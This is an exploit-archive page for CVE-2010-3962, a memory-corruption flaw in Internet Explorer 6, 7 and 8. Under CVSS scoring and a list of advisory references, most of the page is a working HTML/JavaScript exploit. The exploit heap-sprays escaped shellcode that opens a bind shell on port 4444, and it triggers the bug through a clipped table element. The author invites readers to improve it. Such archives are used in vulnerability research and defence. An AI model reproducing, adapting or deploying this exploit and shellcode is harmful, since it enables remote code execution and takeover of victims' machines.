Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit

2010.11.12
Credit: Matteo Memelli
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-3962
CWE: CWE-399


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ offsec.com # http://www.offensive-security.com/0day/ie-0day.txt # Thx to dookie __at__ offsec.com # notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it <!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday Note: The EIP value at crash time depends on the exact version of the mshtml library used by IE. This means that the exploit is not universal for the IE versions indicated in the exploit. IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9 IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD Matteo Memelli, ryujin __at__ offsec.com thx to dookie __at__ offsec.com //--> <html> <head><title>poc CVE-2010-3962 zeroday</title> <script> function alloc(bytes, mystr) { // Bindshell on port 4444 var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+ '%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+ '%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+ '%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301'+ '%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a'+ '%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4'+ '%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268'+ '%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468'+ '%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912'+ '%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856'+ '%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd'+ '%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5'); while (mystr.length< bytes) mystr += mystr; return mystr.substr(0, (bytes-6)/2) + shellcode; } </script> </head> <body> <script> alert('ph33r: click me'); var evil = new Array(); var FAKEOBJ = unescape("%u0d0d%u0d0d"); //FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 //FAKEOBJ = alloc(733120, FAKEOBJ); // IE7 FAKEOBJ = alloc(433120, FAKEOBJ); // IE8 for (var k = 0; k < 1000; k++) { evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length); } document.write("<table style=position:absolute;clip:rect(0)>"); </script> </body> </html>

References:

http://www.kb.cert.org/vuls/id/899748
http://xforce.iss.net/xforce/xfdb/62962
http://www.vupen.com/english/advisories/2010/2880
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://www.securitytracker.com/id?1024676
http://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.exploit-db.com/exploits/15421
http://www.exploit-db.com/exploits/15418
http://secunia.com/advisories/42091
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top